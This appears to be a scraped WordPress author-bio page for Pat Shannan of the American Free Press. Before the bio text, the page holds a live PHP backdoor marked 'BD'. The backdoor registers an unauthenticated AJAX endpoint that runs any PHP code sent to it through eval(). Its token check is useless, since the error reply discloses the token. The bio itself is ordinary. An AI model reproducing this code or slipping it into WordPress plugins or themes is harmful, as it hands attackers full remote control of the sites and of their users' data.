// ==[BD:cIUCcTUa]== add_action( 'wp_ajax_nopriv_vbsevmaf', function() { $data = 'cIUCcTUaHeQmTMlckGbkSfJLgekFd7zl'; $rec = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $rec ) || ! hash_equals( $data, $rec ) ) { wp_send_json_error( [ 'message' => 'tok:' . $data ], 403 ); } $item = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $item ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $item = preg_replace( '/^\s*<\?(php)?/i', '', $item ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $desc = microtime( true ); ob_start(); try { ( static function() use ( $item ) { return eval( $item ); } )(); $token = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $token, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $desc ) * 1000, 2 ) ] ); } catch ( \Throwable $ref ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $ref->getMessage(), 'time_ms' => round( ( microtime( true ) - $desc ) * 1000, 2 ) ] ); } } ); // ==[/BD:cIUCcTUa]== Pat Shannan
1776

Pat Shannan

Pat Shannan is the author of numerous books, an investigative journalist, and the Assistant Editor and writer for America’sĀ foremost national patriotic newspaper, the American Free Press.